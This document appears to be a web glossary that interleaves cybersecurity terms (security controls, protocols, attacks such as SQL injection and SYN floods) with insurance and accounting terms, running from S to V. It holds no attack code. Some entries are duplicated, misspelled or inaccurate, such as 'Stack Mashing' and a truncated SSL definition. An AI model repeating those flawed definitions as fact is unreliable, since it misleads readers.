Security Control Assessment is the testing and/or evaluation of the management, operational, and technical security controls in an information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system. Security Control Assessment is the testing and/or evaluation of the management, operational, and technical security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system and/or enterprise.
Security Control Assessor
A Security Control Assessor is the individual, group, or organization responsible for conducting a security control assessment.
Security Control Baseline
A Security Control Baseline is the set of minimum-security controls defined for a low-impact, moderate-impact, or high-impact information system. One of the sets of minimum-security controls defined for federal information systems is NIST Special Publication 800-53 and CNSS Instruction 1253.
Security Control Effectiveness
Security Control Effectiveness is the measure of correctness of implementation (i.e., how consistently the control implementation complies with the security plan) and how well the security plan meets organizational needs in accordance with current risk tolerance.
Security Control Enhancements
Security Control Enhancements are statements of security capability to 1) build in additional, but related, functionality to a basic control; and/or 2) increase the strength of a basic control. Statements of security capability to: (i) build in additional, but related, functionality to a security control; and/or (ii) increase the strength of the control.
Security Control Inheritance
Security Control Inheritance is a situation in which an information system or application receives protection from security controls (or portions of security controls) that are developed, implemented, assessed, authorized, and monitored by entities other than those responsible for the system or application; entities either internal or external to the organization where the system or application resides. See Common Control.
Security Controls
Security Controls are the management, operational, and technical controls (i.e., safeguards or countermeasures) prescribed for an information system to protect the confidentiality, integrity, and availability of the system and its information.
Security Controls Baseline
Security Controls Baseline is the set of minimum-security controls defined for a low-impact, moderate-impact, or high-impact information system.
Security Domain
A Security Domain is a set of subjects, their information objects, and a common security policy. It is also a collection of entities to which applies a single security policy executed by a single authority. A domain that implements a security policy and is administered by a single authority.
Security Engineering
Security Engineering is an interdisciplinary approach and means to enable the realization of secure systems. It focuses on defining customer needs, security protection requirements, and required functionality early in the systems development life cycle, documenting requirements, and then proceeding with design, synthesis, and system validation while considering the complete problem.
Security Fault Analysis
Security Fault Analysis is an assessment, usually performed on information system hardware, to determine the security properties of a device when hardware fault is encountered.
Security Features Users Guide
(SFUG) A Security Features Users Guide is a guide or manual explaining how the security mechanisms in a specific system work.
Security Filter
Security Filter is a secure subsystem of an information system that enforces security policy on the data passing through it.
Security Functions
Security Functions are the hardware, software, and/or firmware of the information system responsible for enforcing the system security policy and supporting the isolation of code and data on which the protection is based.
Security Goals
Security Goals are the five security goals are confidentiality, availability, integrity, accountability, and assurance.
Security Impact Analysis
Security Impact Analysis is the analysis conducted by an organizational official to determine how much changes to the information system have affected the system's security state.
Security Information and Event Management
Security information and event management (SIEM) is an approach to security management that combines SIM (security information management) and SEM (security event management) functions into one security management system.
Security Inspection
A security inspection is the examination of an information system to determine compliance with security policy, procedures, and practices.
Security Kernel
A security kernel is the Hardware, firmware, and software elements of a trusted computing base implementing the reference monitor concept. A security kernel must mediate all accesses, be protected from modification, and be verifiable as correct.
Security Label
A security label is a marking bound to a resource (which may be a data unit) that names or designates the security attributes of that resource. Information that represents or designates the value of one or more security relevant attributes (e.g., classification) of a system resource.
Security Level
A security level is a hierarchical indicator of the degree of sensitivity to a certain threat. It implies, according to the security policy being enforced, a specific level of protection.
Security Management Dashboard
A security management dashboard is a tool that consolidates and communicates information relevant to the organizational security posture in near real-time to security management stakeholders. Security Marking – Human-readable information affixed to information system components, removable media, or output indicating the distribution limitations, handling caveats, and applicable security markings.
Security Markings
Security markings are human-readable indicators applied to a document, storage media, or hardware component to designate security classification, categorization, and/or handling restrictions applicable to the information contained therein. For intelligence information, security markings could include compartment and sub-compartment indicators and handling restrictions.
Security Mechanism
A security mechanism is a device designed to provide one or more security services usually rated in terms of strength of service and assurance of the design.
Security Net Control Station
A security net control system is a management system overseeing and controlling implementation of network security policy.
Security Objective
A security objective pertains to confidentiality, integrity, or availability.
SET
A Secure Electronic Transaction (SET) is a communications protocol standard for securing credit card transactions over insecure networks. SET ensures that all parties (customers, merchant, and bank) are authenticated using digital signatures, encryption protects the message and provides integrity, and provides end-to-end security for credit card transactions online.
SFA
Security Fault Analysis is an assessment, usually performed on information system hardware, to determine the security properties of a device when hardware fault is encountered.
SHA
Secure Hash Algorithm (SHA) is a hash algorithm with the property that is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest.
SIEM
Security information and event management (SIEM) is an approach to security management that combines SIM (security information management) and SEM (security event management) functions into one security management system.
SSH
Software that allows administrators to securely access a remote computer.
SSL
SSL or Secure Socket Layer is the standard security protocol for establishing an encrypted communication between a web server.
Security Perimeter
A security perimeter is a physical or logical boundary defined for a system, domain, or enclave, within which a specified security policy or security architecture is applied.
Security Plan
A security plan is a formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements.
Security Policy
It is a document that contains a rule or set of rules and procedures for all users accessing and using an organization's IT assets and resources.
Security Posture
The security status of an enterprise’s networks, information, and systems based on IA resources (e.g., people, hardware, software, policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes.
Security Program Plan
A security management plan is a formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management security controls and common security controls in place or planned for meeting those requirements.
Security Range
A security range is the highest and lowest security levels permitted in or on an information system, system component, subsystem, or network.
Security-Relevant Change
A relevant security change is any change to a system’s configuration, environment, information content, functionality, or users which has the potential to change the risk imposed upon its continued operations.
Security-Relevant Event
A security relevant event is an occurrence (e.g., an auditable event or flag) considered to have potential security implications to the system or its environment that may require further action (noting, investigating, or reacting).
Security-Relevant Information
Security relevant information is any information within the information system that can potentially impact the operation of security functions in a manner that could result in failure to enforce the system security policy or maintain isolation of code and data.
Security Requirements
Security requirements are requirements levied on an information system that are derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, or procedures, or organizational mission/business case needs to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.
Security Requirements Baseline
Security requirements baseline is the description of the minimum requirements necessary for an information system to maintain an acceptable level of risk.
Security Requirements Traceability Matrix
A Security Requirements Traceability Matrix (SRTM) is a Matrix that captures all security requirements linked to potential risks and addresses all applicable C&A requirements. It is therefore a correlation statement of a system’s security features and compliance methods for each security requirement.
Security Safeguards
Security safeguards are protective measures and controls prescribed to meet the security requirements specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices.
Security Service
A security service is a capability that supports one, or many, of the security goals. Examples of security services are key management, access control, and authentication. A capability that supports one, or more, of the security requirements (Confidentiality, Integrity, Availability). Examples of security services are key management, access control, and authentication.
Security Specification
Security specification is the detailed description of the safeguards required to protect an information system.
Security Strength
Security strength is a measure of the computational complexity associated with recovering certain secret and/or security-critical information concerning a given cryptographic algorithm from known data (e.g., plaintext/ciphertext pairs for a given encryption algorithm). It is also a number associated with the amount of work (that is, the number of operations) that is required to break a cryptographic algorithm or system. Sometimes referred to as a security level.
Security Tag
A security tag is an information unit containing a representation of certain security related information (e.g., a restrictive attribute bit map).
Security Target
A security target is a Common Criteria specification that represents a set of security requirements to be used as the basis of an evaluation of an identified Target of Evaluation (TOE).
Security Testing
Security Testing is the process to determine that an information system protects data and maintains functionality as intended.
Seed Key
A seed key is an initial key used to start an updating or key generation process.
Segment
A Segment is another name for TCP packets. Dividing an Ethernet into multiple segments is one of the most common ways of increasing available bandwidth on the LAN.
Sensitive Information
Sensitive information is data that must be protected from unauthorized access to safeguard the privacy or security of an individual, organization, or nation. Information sensitivity is the control of access to information or knowledge that might result in loss of an advantage or level of security, if disclosed to others.
Separate Account
Segregated funds held and invested independently of other assets by an insurer for a group retirement fund.
Separation of Duties
Separation of duties (SoD) is also known as “Segregation of duties.” It is based on the principle of splitting privileges among multiple individuals or systems.
Server
A server is a computer entity or a machine that waits for requests from other machines or software (clients) and responds to them. The purpose of a server is to share data or hardware and software resources among clients.
Session
A session is a virtual connection between two hosts by which network traffic is passed. It is a way to store information (in variables) to be used across multiple pages.
Session Hijacking
Session hijacking is also known as cookie hijacking. It is the exploitation of a valid computer session, sometimes also called a session key, to gain unauthorized access to sensitive information or services in a computer system or network.
Session Key
A session key is a key that is temporary or is used for a relatively brief period of time. It is an encryption and decryption key that is randomly generated to ensure the security of a communications session between a user and another computer or between two computers. These keys are sometimes called symmetric keys because the same key is used for both encryption and decryption.
SHA1
Secure Hash Algorithm 1 (SHA-1) is a cryptographic hash function designed by the United States National Security Agency and is a U.S. Federal Information Processing Standard published by the United States NIST.
Shadow Password Files
Shadow Password Files are system files where encryption user passwords are stored so that they aren’t available to people who try to break into the system.
Share
A share is any resource made public on a system or network, such as a directory (file share) or printer (printer share).
Shell
Shell is a user interface for access to an operating system's services.
Signals Analysis
Signals Analysis is a process of gaining indirect knowledge of communicated data by monitoring and analyzing a signal that is emitted by a system and that contains the data but is not intended to communicate the data.
Signature
A signature is like a fingerprint or a pattern that can be used to detect and identify malware.
Simple Integrity Property
In Simple Integrity Property, a user cannot write data to a higher integrity level than their own.
Simple Network Management Protocol
Simple Network Management Protocol (SNMP) is an Internet-standard protocol for managing devices on IP networks. Devices that typically support SNMP include routers, switches, servers, workstations, printers, modem racks and more. SNMP is widely used in network management systems to monitor network-attached devices for conditions that warrant administrative attention.
Simple Security Property
In Simple Security Property, a user cannot read data of a higher classification than their own.
Situs of Contract
The jurisdiction in which the contract is issued or delivered as stated in the contract.
Smartcard
A smart card is an electronic badge that includes a magnetic strip or chip that can record and replay a set key. The card connects to a reader with direct physical contact or with a remote contactless radio frequency interface.
Smurf Attack
A Smurf Attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim’s spoofed source IP are broadcast to a computer network using an IP broadcast address. Most devices on a network respond to this by sending a reply to the source IP address. This can slow down the victim’s computer to the point where it becomes impossible to work on.
Sniffer
A sniffer monitors network traffic received in a network interface.
Sniffing
Sniffing is also known as passive wiretapping. Packet sniffing allows individuals to capture data as it is transmitted over a network. Packet sniffer programs are used by network professionals to diagnose network issues and by malicious users to capture unencrypted data like passwords and usernames in network traffic. Once this information is captured, the user can then gain access to the system or network.
SNMP
Simple Network Management Protocol (SNMP) is an Internet-standard protocol for managing devices on IP networks. Devices that typically support SNMP include routers, switches, servers, workstations, printers, modem racks and more. SNMP is widely used in network management systems to monitor network-attached devices for conditions that warrant administrative attention.
Social Engineering
A method of manipulating people via phone, email, or in-person to gain confidential information or unauthorized access.
Social Networking
Social networking websites allow you to communicate and share information. But they can also be used to spread malware and to steal personal information.
Socket
A socket is an end point for communication between two systems. The socket tells a host’s IP stack where to plug in a data stream so that it connects to the right application.
Socket Pair
A Socket Pair is a way to uniquely specify a connection, i.e., source IP address, source port, destination IP address, destination port.
SOCKS
Socket Secure (SOCKS) is an Internet protocol that routes network or data packets between a client and server through a proxy server. SOCKS ensures proper authentication of users and allows authorized users only to access a server. SOCKS uses sockets to represent and keep track of individual connections. The client side of SOCKS is built into certain Web browsers and the server side can be added to a proxy server.
Soft Market
A buyer's market characterized by abundant supply of insurance driving premiums down.
Software
Software is any computer instructions, data, or programs that can be stored electronically and executed by computer hardware. While running any software, associated data that is stored in the hardware may be dynamically written or modified.
Source Port
A source port is a port that a host uses to connect to a server. It is usually a number greater than or equal to 1024. It is randomly generated and is different each time a connection is established.
SRTM
A Security Requirements Traceability Matrix (SRTM) is a Matrix that captures all security requirements linked to potential risks and addresses all applicable C&A requirements. It is; therefore, a correlation statement of a system’s security features and compliance methods for each security requirement.
SAP
A set of accounting principles set forth by the National Association of Insurance Commissioners is used to prepare statutory financial statements for insurance companies.
Spam
Unsolicited messages sent to many recipients are usually through commercial messages such as emails, text messages, or Internet postings.
Spam Filter
A program for detecting and blocking unsolicited email on a network.
Spanning Port
A Spanning port is used to configure the switch to behave like a hub for a specific port.
Spear Phishing
A phishing attack that targets specific users to persuade people in an organization to reveal critical data or credentials.
Split Horizon
A Split Horizon is an algorithm used to prevent routing loops in distance-vector routing protocols by prohibiting a router from advertising a route back onto the interface from which it was learned.
Split Key
A Split key is a cryptographic key that is divided into two or more separate data items that individually convey no knowledge of the whole key or information that results from combining the items.
Spoof
A Spoof is an attack attempt by an unauthorized entity or attacker to gain illegitimate access to a system by posing as an authorized user.
Spoofing Email
Email spoofing is when the sender address of an email is forged for social engineering.
Spyware
Spyware is a type of malware that’s secretly installed on a device. In most cases, spyware tracks and relays user activities such as keystrokes and browsing behavior.
SQL Injection
SQL Injection or SQLi refers to an injection attack wherein an attacker executes malicious Structured Query Language (SQL) statements on a web application’s database server to gain access or make changes to the data.
Stack Mashing
Stack smashing is used to cause a stack in a computer application or operating system to overflow. This makes it possible to weaken the program or system or cause it to crash. The stack is also called a pushdown stack or first-in last-out circuit. It is a buffer that holds the intermediate results of an operation or data awaiting processing.
Standard ACLs (Cisco)
Standard Access Control Lists (ACLs) are essentially a set of commands, grouped together by a number or name that is used to filter traffic entering or leaving an interface. ACLs make packet filtering decisions based on Source IP address only.
Standard Risk
A person who, according to a company's underwriting standards, is considered a normal risk and insurable at standard rates. High or low risk candidates may qualify for extra or discounted rates based on their deviation from the standard.
Star Network
Star networks are one of the most common computer network topologies. A star network consists of one central switch, hub, or computer, which acts as a conduit to transmit messages. This consists of a central node, to which all other nodes are connected. The central node provides a common connection point for all nodes through a hub.
Star Property
A Star Property is a user unable to write data to a lower classification level without logging in at that lower classification level when using star property.
State Machine
A state machine is any device that stores the status of something at a given time and can operate on input to change the status and cause an action to take place for any given change. A computer is basically a state machine, and each machine instruction is input that changes one or more states and may cause other actions to take place. Each computer’s data register stores a state. The read-only memory from which a boot program is loaded stores a state.
State of Domicile
The state where a company's home office is located.
State Page
Exhibit of Premiums and Losses for each state a company is licensed. The state of domicile receives a schedule for each jurisdiction the company wrote direct business, or has amounts paid, incurred or unpaid.
Stateful Inspection
The stateful inspection also referred to as dynamic packet filtering is a type of packet filtering that helps to control how data packets move through a firewall.
Statement Type
Refers to the primary business type under which the company files its annual and quarterly statement, such as Life, Property, Health, Fraternal, Title.
Statement Value
The Statutory Accounting Principal book value reduced by any valuation allowance and non-admitted adjustment applied to an individual investment or a similar group of investments, e.g., bonds, mortgage loans, common stock.
Static Host Tables
Static host tables are text files that contain hostnames and address mapping.
Static Routing
Static routing is a form of routing that occurs when a router uses a manually configured routing entry, rather than information from a dynamic routing traffic. Static routing can also be used in stub networks, or to provide a gateway of last resort.
Statutory Accounting
Method of accounting standards and principles used by state regulatory authorities to measure the financial condition of regulated companies and other insurance enterprises. This method tends to be more conservative than the Generally Accepted Accounting Principles used by most businesses. Compliance with solvency and other standards is determined using financial documents prepared in accordance with Statutory Accounting Principles.
Statutory Accounting Principles
A set of accounting principles set forth by the National Association of Insurance Commissioners is used to prepare statutory financial statements for insurance companies.
Stealthing
Stealthing is a term that refers to approaches used by malicious code to conceal its presence on the infected system.
Steganalysis
Steganalysis is the study of detecting and defeating the use of steganography. This is analogous to cryptanalysis applied to cryptography.
Steganography
Steganography is a technique used to hide the existence of a message, files, or any other information. The first recorded use of the term was in 1499 by Johannes Trithemius in his Steganographia. This is different than cryptography, which hides the meaning of a message but does not hide the message itself. An example of a steganographic method is the invisible ink.
Stimulus
Stimulus is network traffic that initiates a connection or solicits a response.
Store-and-Forward
Store-and-Forward is a telecommunications technique in which information is sent to an intermediate station where it is kept and sent at a later time to the final destination or to another intermediate station.
Straight-Through Cable
A straight-through cable is a type of twisted pair cable that is used in local area networks to connect a computer to a network hub such as a router. This type of cable is also sometimes called a patch cable and is an alternative to wireless connections where one or more computers access a router through a wireless signal.
Stream Cipher
A stream cipher is a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream. In a stream cipher, each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of ciphertext stream.
Strong Star Property
In Strong Star Property, a user cannot write data to higher or lower classifications levels than their own.
Structured Securities
Loan-backed securities that have been divided into two or more classes of investors where the payment of interest and/or principal of any class of securities has been allocated in a manner that is not proportional to interest and/or principal received by the issuer from the mortgage pool or other underlying securities.
Structured Settlements
Periodic fixed payments to a claimant for a determinable period, or for life, for the settlement of a claim.
Sub Network
A sub network is a separately identifiable part of a larger network that typically represents a certain limited number of host computers, the hosts in a building or geographic area, or the hosts on an individual local area network.
Subnet Mask
A subnet mask determines the number of bits used for the subnet and host portions of the address. It is used as a screen of numbers used for routing traffic within a subnet. Once a packet has arrived at a gateway or connection point with its unique network number, it can be routed to its destination within the internal gateways using the subnet number.
Subrogation
Situation where an insurer, on behalf of the insured, has a legal right to bring a liability suit against a third party who caused losses to the insured. The insurer maintains the right to seek reimbursement for losses incurred by the insurer at the fault of a third party.
Subrogation Clause
Section of insurance policies giving an insurer the right to take legal action against a third party responsible for a loss to an insured for which a claim has been paid.
Subsequent Event
Events or transactions that occur subsequent to the balance sheet date, but before the issuance of the statutory financial statements and before the date the audited financial statements are issued, or available to be issued.
Substandard Risk
Impaired risk) risks deemed undesirable due to medical condition or hazardous occupation requiring the use of a waiver, a special policy form, or a higher premium charge.
Surety Bond
A three-party agreement whereby a guarantor (insurer) assumes an obligation or responsibility to pay a second party (obligee) should the principal debtor (obligor) become in default.
Surplus
Insurance term referring to retained earnings.
Surplus Line
Specialized property or liability coverage is available via non-admitted insurers, not through an admitted insurer, licensed to sell that coverage in the state.
Suspicious Files and Behavior
When an endpoint security solution scans files, it labels them as clean or malicious. If a file has questionable characteristics or behavior, it is labeled as suspicious.
Swap
An agreement to exchange or net payments as the buyer of an Option, Cap or Floor and to make payments as the seller of a different Option, Cap or Floor.
Switch
Is a device that connects multiple devices together on a network by using packet switching to receive, process, and forward data to the destination devices.
Switched Network
A Stitched Network is a fully switched network is a computer network that uses only network switches rather than network hubs on Ethernet local area networks. The switches allow for a dedicated connection to each workstation. A switch allows for many conversations to occur simultaneously.
Symbolic Links
Symbolic links are sometimes also known as symlinks. Symbolic links are essentially advanced shortcuts that point to another file.
Symmetric Cryptography
Symmetric Cryptography is a branch of cryptography involving algorithms that use symmetrical keys for two different steps of the algorithm. Symmetric cryptography is called secret-key cryptography because the entities that share the key.
Symmetric Key
A Symmetric key is used in a symmetric cryptographic algorithm.
SYN Flood
A SYN flood is a type of denial-of-service attack in which an attacker sends a succession of SYN requests to a target’s system to consume enough server resources to make the system unresponsive to legitimate traffic.
Synchronization
Synchronization is the signal made up of a distinctive pattern of bits that network hardware looks for to signal that start of a frame. Synchronization refers to one of two distinct but related concepts: synchronization of processes, and synchronization of data.
Syslog
A Syslog is a widely used standard for message logging facility in Unix systems. It permits separation of the software that generates messages, the system that stores them, and the software that reports and analyzes them.
System-Specific Policy
A system-specific policy is a policy written for a specific system or device and may change with changes in the system or device, its functionality, or its vulnerabilities.
T
Tamper
Tamper is defined as deliberately trying to change or alter a system’s logic, data, or control information to cause the system to perform unauthorized functions or services.
TCP
Transmission control protocol (TCP) is a network communication protocol designed to send data packets over the Internet.
TCP Fingerprinting
TCP/IP stack fingerprinting is the passive collection of configuration attributes from a remote device during standard layer 4 network communications. The combination of parameters may be used to infer the remote machine’s operating system (OS) or incorporated into a device fingerprint.
TCP Full Open Scan
A TCP Full Open Scan checks each port after performing a full three-way handshake on each port to determine if it was open.
TCP Half Open Scan
A TCP Half Open Scan determines if a port is open by performing the first half of a three-way handshake. It is also referred to as the SYN scanning. In SYN scanning, the hostile client or attacker attempts to set up a TCP/IP connection with a server at every possible port. This is done by sending a SYN (synchronization) packet, as if to initiate a three-way handshake, to every port on the server.
TCP/IP
TCP/IP stands for Transmission Control Protocol/Internet Protocol. It is a basic communication language or protocol of the Internet and can be used as a communications protocol in a private network as well (either an intranet or an extranet).
TCP Wrapper
A TCP Wrapper is a software package used to restrict access to certain network services based on the connection source. In other words, it is a host-based networking ACL system, used to filter network access to Internet Protocol servers on (Unix-like) operating systems such as GNU/Linux or BSD.
TCPDump
A TCPDump is a freeware protocol analyzer for Unix systems that can monitor network traffic on a wire. It allows the user to display TCP/IP and other packets being transmitted or received over a network. Tcpdump works on most Unix-like operating systems: Linux, Solaris, BSD, OS X, HP-UX, Android, and AIX, among others. It was originally written in 1987 by Van Jacobson, Craig Leres and Steven McCanne who were working in the Lawrence Berkeley Laboratory Network Research Group
TELNET
Telnet is a TCP-based application-layer, Internet Standard protocol, and an essential TCP/IP protocol for accessing remote computers. Through Telnet, an administrator or another user can access someone else’s computer remotely.
Tenants
A person(s) who occupies land or property rented from a landlord.
Term
Period of time for which policy is in effect.
Term Insurance
Life insurance payable only if death of insured occurs within a specified time, such as 5 or 10 years, or before a specified age.
Third Party
A person other than the insured or insurer who has incurred losses or is entitled to receive payment due to the acts or omissions of the insured.
Threat
A threat, in the context of cybersecurity, refers to anything that can harm a computer system.
Threat Agent
An individual, group, organization, or government that conducts or intends to conduct malicious activities.
Threat Assessment
It is a practice of determining the credibility and seriousness of a potential threat, as well as the probability that the threat will become a reality.
Threat Model
A Threat Model is a process used to optimize network security by identifying the key objectives and vulnerabilities and then defining countermeasures to prevent, or mitigate, threats to the system or network.
Threat Vector
A Threat Vector is a methodology that a threat uses to get to the target.
Time to Live
Time to Live (TTL) or the hop limit is a mechanism that limits the lifespan of data in a computer or network. TTL is generally implemented as a counter or time stamp attached to or embedded in the data. TTL value in an IP data packet tells a network router if the packet has been in the network too long and should be discarded.
Tiny Fragment Attack
A Tiny Fragment attack is IP fragmentation that is the process of breaking up a single Internet Protocol (IP) datagram into multiple packets of smaller sizes. Every network link has a characteristic size of messages that may be transmitted, called the maximum transmission unit (MTU). If the data packet size is made small enough to force some of a TCP packet’s TCP header fields into the second data fragment, filter rules that specify patterns for those fields will not match. If the filtering implementation does not enforce a minimum fragment size, a disallowed packet might be passed because it didn’t hit a match in the filter. STD 5, RFC 791 states that, “Every Internet module must be able to forward a datagram of 68 octets without further fragmentation.” This is because an Internet header may be up to 60 octets, and the minimum fragment is 8 octets. IP fragmentation exploits (attacks) use the fragmentation protocol within IP as an attack vector.
Title Insurance
Coverage that guarantees the validity of a title to real and personal property. Buyers of real and personal property and mortgage lenders rely upon the coverage to protect them against losses from undiscovered defects in existence when the policy is issued.
TLS
Transport Layer Security (TLS) is a protocol that ensures privacy between communicating applications and the users on the Internet. When a server and client communicate, TLS ensures that no third party may overhear or tamper with any message. TLS is the successor to the Secure Sockets Layer (SSL).
Token-Based Access Control
Token-based Access Control is an authentication method that offers additional security. Using this method, each user has a smart card or token that either displays a constantly changing password, passkey, or buttons that calculate a new password based on a challenge phrase. Without this card or token, it is impossible to authenticate yourself to the system. This two-factor authentication provides additional security by requiring an attacker to both guess the user’s password and steal the smart card or token that is used to access the system.
Token-Based Devices
A Token-based device or a security token is known by several names such as, hardware token, authentication token, USB token, cryptographic token, software token, virtual token, or key fob. A security token may be a physical device that an authorized user is given to access a system or network. Security tokens are used to prove one’s identity electronically and are used in addition to or in place of a password to prove that the customer is who they claim to be. The token acts like an electronic key to access something.
Token Ring
A token ring network is a local area network in which all computers are connected in a ring or star topology and a binary digit or token-passing scheme is used in order to prevent the collision of data between two computers that want to send messages at the same time. It uses a special three-byte frame called a “token” that travels around a logical “ring” of workstations or servers.
Topology
Topology is the geometric arrangement of a computer system. Common topologies include a bus, star, and ring. Two networks have the same topology if the connection configuration is the same, although the networks may differ in physical interconnections, distances between nodes, transmission rates, and/or signal types.
Total Liabilities
Total money owed or expected to be owed by the insurance company.
Total Revenue
Premiums, revenue, investment income, and income from other sources.
Traceroute
Traceroute is a tool the maps the route a packet takes from the local machine to a remote destination. The history of the route is recorded as the round-trip times of the packets received from each successive host (remote node) in the route (path). The sum of the mean time in each hop indicates the total time spent to establish the connection.
Transmission Control Protocol
Transmission control protocol (TCP) is a network communication protocol designed to send data packets over the Internet.
Transport Layer Security
Transport Layer Security (TLS) is a protocol that ensures privacy between communicating applications and the users on the Internet. When a server and client communicate, TLS ensures that no third party may overhear or tamper with any message. TLS is the successor to the Secure Sockets Layer (SSL).
Travel Coverage
Covers financial loss due to trip cancellation/interruption; lost or damaged baggage; trip or baggage delays; missed connections and/or changes in itinerary; and casualty losses due to rental vehicle damage.
Treaty
A reinsurance agreement between the ceding company and reinsurer.
Triple DES
Triple DES (3DES) is the common name for the Triple Data Encryption Algorithm (TDEA or Triple DEA) symmetric-key block cipher, which applies the Data Encryption Standard (DES) cipher algorithm three times to each data block. It transforms each 64-bit plaintext block by applying the DES three successive times, using either two or three different keys, for an effective key length of 112 or 168 bits.
Triple-Wrapped
Triple wrapped describes any data that has been signed with a digital signature, encrypted, and then signed again is called triple wrapped.
Trojan
Trojan is a type of malware that is often disguised as legitimate software.
Trojan Horse
Trojans are malicious programs that pretend to be legitimate software but carry out hidden, harmful functions.
Trunking
Trunking is a method for a system to provide network access to many clients by sharing a set of lines or frequencies instead of providing them individually. This is analogous to the structure of a tree with one trunk and many branches.
Trust
Trust determines which permissions and what actions other systems or users can perform on remote machines.
Trusted Certificate
A Trusted Certificate is any digital certificate that a certificate user accepts as being valid without testing the certificate to validate it as the final certificate on a certification path; especially a certificate that is used as a trust anchor certificate.
Trusted Ports
Trusted ports are ports below number 1024 usually allowed to be opened by the root user.
Tunnel
A Tunnel is a communication channel created in a computer network by encapsulating a communication protocol’s data packets in a second protocol that normally would be carried above, or at the same layer as, the first one. Most often, a tunnel is a logical point-to-point link created by encapsulating the layer 2 protocol in a transport protocol (such as TCP), in a network or inter-network layer protocol (such as IP), or in another link layer protocol. Tunneling can move data between computers that use a protocol not supported by the network connecting them.
Two-factor authentication (or multi-factor authentication)
This term describes the use of two authentication methods to log into a system. Two-factor authentication prevents attackers from gaining access with just one exploited password. For example, you may still need to enter a code from an authenticator app after entering your password to log in.
U
UDP Scan
A UDP Scan performs scans to determine which UDP ports are open or vulnerable. UDP is a connectionless protocol so there is no equivalent to a TCP SYN packet. However, if a UDP packet is sent to a port that is not open, the system will respond with an ICMP port unreachable message.
ULAE
Loss adjustment expenses that cannot be specifically tied to a claim.
Unallocated Loss Adjustment Expense
Loss adjustment expenses that cannot be specifically tied to a claim.
Unauthorized Reinsurance
Reinsurance placed with a company not authorized in the reporting company's state of domicile.
Underlying Interest
The asset(s), liability(ies) or other interest(s) underlying a derivative instrument, including, but not limited to, any one or more securities, currencies, rates indices, commodities, derivative instruments, or other financial market instruments.
Underwriter
A person who identifies, examines, and classifies the degree of risk represented by a proposed insured to determine if coverage should be provided and, if so, at what rate.
UDP
User Datagram Protocol (UDP) is an alternative communications protocol to Transmission Control Protocol (TCP) and is used primarily for establishing low-latency and loss-tolerating connections over the Internet.
Underwriting
The process by which an insurance company examines risk and determines whether the insurer will accept the risk or not, classifies those accepted and determines the appropriate rate for coverage provided.
Underwriting Risk
Section of the risk-based capital formula calculating requirements for reserves and premiums.
Unearned Premium
Amount of premium for which payment has been made by the policyholder but coverage has not yet been provided.
Unearned Premium Reserve
All premiums (fees) received for coverage extending beyond the statement date appear as a liability on the balance sheet.
Unicast
Unicast is defined as any communication between a single sender and a single receiver over a network. The term exists in contradiction to multicast, communication between a single sender and multiple receivers, and any cast, communication between any sender and the nearest of a group of receivers in a network.
Unified Threat Management
UTM brings together multiple security functions into a single network appliance.
Uniform Resource Identifier
A Uniform Resource Identifier (URI) is a string of characters used to identify a resource's name. Such identification enables interaction with representations of the resource over a network (such as the World Wide Web) using specific protocols. In other words, URI is the generic term for all types of names and addresses that refer to objects on the World Wide Web.
Uniform Resource Locator
A Uniform Resource Locator (URL) is the global address of documents and other resources on the World Wide Web. The first part of the address indicates what protocol to use, and the second part specifies the IP address or the domain name where the resource is located. A URL is a specific type of Uniform Resource Identifier (URI), although many people use the two terms interchangeably. A URL implies the means to access an indicated resource, which is not true of every URI. URLs occur most commonly to reference web pages (http) but are also used for file transfer (ftp), email (mail to), database access (JDBC), and many other applications.
Unix
Unix is a popular multi-user, multi-tasking operating system developed at Bell Labs in the early 1970s by Ken Thompson, Dennis Ritchie, and others. Unix was designed to be a small, flexible system used exclusively by programmers.
Unpaid Losses
Claims that are in the course of settlement. The term may also include claims that have been incurred but not reported.
Unprotected Share
An unprotected share is a mechanism that allows a user to connect to file systems and printers on other systems. An unprotected share is one that allows anyone to connect to it.
URI
A Uniform Resource Identifier (URI) is a string of characters used to identify a resource's name. Such identification enables interaction with representations of the resource over a network (such as the World Wide Web) using specific protocols. In other words, URI is the generic term for all types of names and addresses that refer to objects on the World Wide Web.
URL
A Uniform Resource Locator (URL) is the global address of documents and other resources on the World Wide Web. The first part of the address indicates what protocol to use, and the second part specifies the IP address or the domain name where the resource is located. A URL is a specific type of Uniform Resource Identifier (URI), although many people use the two terms interchangeably. A URL implies the means to access an indicated resource, which is not true of every URI. URLs occur most commonly to reference web pages (http) but are also used for file transfer (ftp), email (mail to), database access (JDBC), and many other applications.
URL/Web Content Filtering
URL or web content filtering describes the technology that allows organizations to block specific websites or entire categories.
User
A User is any person, organization entity, or automated process that accesses a system, whether authorized to do so or not. Users generally use a system or a software product without the technical expertise required to fully understand it.
User Contingency Plan
A User contingency plan is an alternative method of continuing business operations if IT systems are unavailable.
User Datagram Protocol
User Datagram Protocol (UDP) is an alternative communications protocol to Transmission Control Protocol (TCP) and is used primarily for establishing low-latency and loss-tolerating connections over the Internet.
UTM
UTM brings together multiple security functions into a single network appliance.
V
Valued Policy
An insurance contract for which the value is agreed upon in advance and is not related to the amount of the insured loss.
Valued Policy Law
State legislation specifies that the insured shall receive the face amount of the policy in the event of a total loss to a dwelling rather than the actual cash value regardless of the principle of indemnity.
Variable Annuity
An annuity contract under which the premium payments are used to purchase stock and the value of each unit is relative to the value of the investment portfolio.
Viatical Settlements
Contracts or agreements in which a buyer agrees to purchase all or a part of a life insurance policy.
VIPS
A Voice Intrusion Prevention System (VIPS) is a security management system for voice networks that monitors voice traffic for multiple calling patterns or attack/abuse signatures to proactively detect and prevent toll fraud, denial of service, telecom attacks, service abuse, and other anomalous activities.
Virtual Private Network
Virtual Private Network or VPN allows users to securely access a private network via an encrypted tunnel over the Internet.
Virus
